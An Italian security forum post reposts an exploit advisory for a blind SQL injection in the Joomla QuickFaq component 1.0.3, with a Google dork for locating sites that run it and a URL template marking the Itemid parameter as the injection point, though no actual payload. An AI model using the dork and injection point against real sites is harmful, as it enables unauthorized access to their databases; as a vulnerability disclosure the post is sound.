Autore Topic: Joomla component QuickFaq - com_quickfaq BSQL-i Vuln.  (Letto 759 volte)

Offline jeckodevelopment

  • Administrator
  • Instancabile
  • *****
  • Post: 5659
  • Sesso: Maschio
    • Mostra profilo
Non si hanno ancora maggiori informazioni riguardo questa vulnerabilitÓ di tipo Blind SQL Injection.

Codice: [Seleziona]
-------------
Joomla Component (com_quickfaq) BSQL-i Vulnerability
------------------------
[+]Title Joomla Component (com_quickfaq) BSQL-i
Vulnerability
[+]Author **RoAd_KiLlEr**
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Vendor: http://www.schlu.net
[~] Download
Application:http://www.schlu.net/downloads/16-component/77-quickfaq.html
[~] Version: 1.0.3
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
QuickFAQ is an easy to use but powerful FAQ management system.

Feature List:
* Unlimited Subcategories
* Assign FAQ Items to multiple Categories
* Create Tags/Labels to flag FAQ Items
* Up/down voting of FAQ Items
* Favoure FAQ Items to maintain a personal bookmark list
* Document uploader/manager
* PDF creation of FAQ Items
* RTL support
* RSS/ATOM Feeds
* Detailed statistics
* JComments and JomComments integration
=========================================

[+] Dork: inurl:"com_quickfaq"

==========================================
[+]. SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[Exploit]:
http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Vali
d Cid]&Itemid= [BSQL-Injection]


 

Host

Torna su